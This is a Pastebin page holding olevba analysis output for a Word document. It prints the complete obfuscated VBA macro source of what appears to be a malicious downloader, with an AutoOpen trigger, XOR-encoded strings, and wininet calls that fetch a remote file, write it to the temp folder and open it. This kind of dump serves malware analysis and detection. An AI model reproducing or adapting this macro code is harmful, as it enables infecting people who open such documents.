Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- car015890001.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: car015890001.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: car015890001.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub InIn()
- D22D22D22D22
- End Sub
- Sub autoopen()
- InIn
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO FILE6.bas
- in file: car015890001.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Public Const C1C1C1A = "D25D25D25D25"
- Private Const D1D1D1D1 = 8162
- Private Const D2D2D2D2 As String = "D3D3D3D3D3"
- Private Const D4D4D4D4 = 1
- Private Const D5D5D5D5 = &H4000000
- Public Function C16C16C16 _
- (ByVal D6D6D6D6 As String) As Boolean
- #If VBA7 _
- And Win64 Then
- Dim D7D7D7D7 As LongPtr, D8D8D8D8 As LongPtr
- #Else
- Dim D7D7D7D7 As Long, D8D8D8D8 As Long
- #End If
- Dim D10D10D10D10 As Long
- Dim C33C33C33 As String * D1D1D1D1, D9D9D9D9 As String
- Dim D11D11D11D11 As Integer, D12D12D12D12 As Double
- D7D7D7D7 = C2C2C2(D2D2D2D2, D4D4D4D4, vbNullString, vbNullString, 0)
- If D7D7D7D7 = 0 Then
- Exit Function
- End If
- Dim FiGaMan As Boolean
- If D15D15D15D15(D8D8D8D8, D7D7D7D7) Then
- End If
- If D8D8D8D8 = 0 Then
- D12D12D12D12 = 0
- Else
- C3C3C3 D8D8D8D8, C33C33C33, D1D1D1D1, D10D10D10D10
- D9D9D9D9 = C33C33C33
- Do While D10D10D10D10 <> 0
- C3C3C3 D8D8D8D8, C33C33C33, D1D1D1D1, D10D10D10D10
- Dim Z1z1Z1z1Z1z1 As Integer
- For Z1z1Z1z1Z1z1 = 110 _
- To 111
- If Z1z1Z1z1Z1z1 = 1000 Then _
- End
- Next Z1z1Z1z1Z1z1
- D9D9D9D9 = D9D9D9D9 + Mid(C33C33C33, 1, D10D10D10D10)
- Loop
- D12D12D12D12 = D13D13D13D13(D9D9D9D9): D11D11D11D11 = FreeFile
- Open D6D6D6D6 _
- For Binary Access Write _
- Lock Write _
- As #D11D11D11D11
- Put #D11D11D11D11, _
- , D9D9D9D9
- Dim S1s1S1s1S1s1S1s1 As _
- Long
- For S1s1S1s1S1s1S1s1 = 111 To 112
- If S1s1S1s1S1s1S1s1 = 2000 Then _
- End
- Next S1s1S1s1S1s1S1s1
- Close #D11D11D11D11
- End If
- C1C1C1 D8D8D8D8
- C1C1C1 D7D7D7D7
- D9D9D9D9 = ""
- If D12D12D12D12 Then
- C16C16C16 = True
- End If
- End Function
- Public Function D13D13D13D13(D14D14D14D14 As String) As Long
- D13D13D13D13 = Len(D14D14D14D14)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PIDLE0.bas
- in file: car015890001.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public _
- Declare _
- PtrSafe _
- Function _
- C1C1C1 Lib _
- "wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long
- Public _
- Declare _
- PtrSafe _
- Function _
- C2C2C2 Lib _
- "wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr
- Public _
- Declare _
- PtrSafe _
- Function _
- C3C3C3 Lib _
- "wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
- Public _
- Declare _
- PtrSafe _
- Function _
- C4C4C4 Lib _
- "wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr
- #Else
- Public Declare Function C1C1C1 Lib "wininet.dll" _
- Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long
- Public Declare Function C2C2C2 Lib "wininet.dll" _
- Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long
- Public Declare Function C3C3C3 Lib "wininet.dll" _
- Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
- Public Declare Function C4C4C4 Lib "wininet.dll" _
- Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long
- #End If
- Public Function C21C21C21() As Object
- Dim C22C22C22 As String
- C22C22C22 = C8C8C8(C9C9C9, C10C10C10)
- Set C21C21C21 = CreateObject(C22C22C22)
- End Function
- Sub D22D22D22D22()
- Dim D23D23D23D23 As Long
- Dim D21D21D21D21S As Integer
- For D21D21D21D21S = 1101 To 1110
- If D21D21D21D21S = 1111 Then End
- Next D21D21D21D21S
- D23D23D23D23 = 111
- D24D24D24D24 (D23D23D23D23)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL4.bas
- in file: car015890001.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const C18C18C18 = "102B262F2F6D023434282D2725372A2C2D"
- Public Const C19C19C19 = "1F2A3737263B37756A716A213C26"
- Public Const C20C20C20 = "2B373733796C6C2B2A21292D2A2724312C36336D202B296B7772726C727277"
- Public Const C10C10C10 = "1020312A33372A2A236A022D2826103A3037262E0C262E212730"
- Public Const C9C9C9 = "CCCCCCCCDDDDDD"
- Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
- If CAILEIGH.FileExists(CAILYN) Then
- CADY = True
- Else
- CADY = False
- End If
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function D15D15D15D15(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
- #Else
- Public Function D15D15D15D15(ByRef CALIDA As Long, CALLA As Long) As Boolean
- #End If
- Dim CALLIDORA As String
- CALLIDORA = C8C8C8(C9C9C9, C20C20C20)
- CALIDA _
- = C4C4C4 _
- ( _
- CALLA, _
- CALLIDORA, vbNullString, _
- 0, _
- D5D5D5D5, 0)
- D15D15D15D15 = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO M.bas
- in file: car015890001.doc - OLE stream: u'Macros/VBA/M'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function C5C5C5(ByRef C23C23C23 As Object) As Object
- Set C5C5C5 = C23C23C23.GetSpecialFolder(2)
- End Function
- Sub D24D24D24D24(CALEIGH As Long)
- C25C25C25 ("CACACARDRDRDRD")
- End Sub
- Public Function C8C8C8(D16D16D16D16 As String, D17D17D17D17 As String) As String
- Dim D18D18D18D18 As Integer
- Dim D19D19D19D19 As Integer
- Dim W1w1W1w1W1w1W1w1 As _
- Long
- For W1w1W1w1W1w1W1w1 = 1110 To 1111
- If W1w1W1w1W1w1W1w1 = 1000 Then _
- End
- Next W1w1W1w1W1w1W1w1
- Dim D30D30D30D30 As Long
- D30D30D30D30 = D13D13D13D13(D17D17D17D17)
- D30D30D30D30 = D30D30D30D30 / 2
- Dim D20D20D20D20 As Long
- Dim D21D21D21D21 As String
- For D20D20D20D20 = 1 _
- To _
- D30D30D30D30
- D18D18D18D18 = Val("&H" & _
- (Mid$(D17D17D17D17, _
- (2 * D20D20D20D20) - 1, 2)))
- D19D19D19D19 = Asc(Mid$(D16D16D16D16, _
- ((D20D20D20D20 Mod D13D13D13D13(D16D16D16D16)) + 1), 1))
- D21D21D21D21 = D21D21D21D21 + Chr(D18D18D18D18 Xor D19D19D19D19)
- Next D20D20D20D20
- C8C8C8 = D21D21D21D21
- End Function
- Public Function C25C25C25(C24C24C24 As String)
- C6C6C6
- End Function
- Public Function C6C6C6()
- Dim C7C7C7 As Object
- Set C7C7C7 = C21C21C21
- Dim C11C11C11 As Object
- Set C11C11C11 = C5C5C5(C7C7C7)
- Dim C15C15C15
- Dim C12C12C12
- C12C12C12 = C8C8C8(C9C9C9, C19C19C19)
- C15C15C15 = C11C11C11 & C12C12C12
- If CADY(C7C7C7, C15C15C15) Then
- C7C7C7. _
- DeleteFile C15C15C15
- End If
- If C16C16C16(C15C15C15) Then
- End If
- If CADY(C7C7C7, C15C15C15) Then
- End If
- Dim C17C17C17
- Set C17C17C17 = CreateObject _
- (C8C8C8 _
- (C9C9C9, C18C18C18))
- C17C17C17.Open C15C15C15
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: car015890001.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO UserForm2.frm
- in file: car015890001.doc - OLE stream: u'Macros/VBA/UserForm2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO UserForm3.frm
- in file: car015890001.doc - OLE stream: u'Macros/VBA/UserForm3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement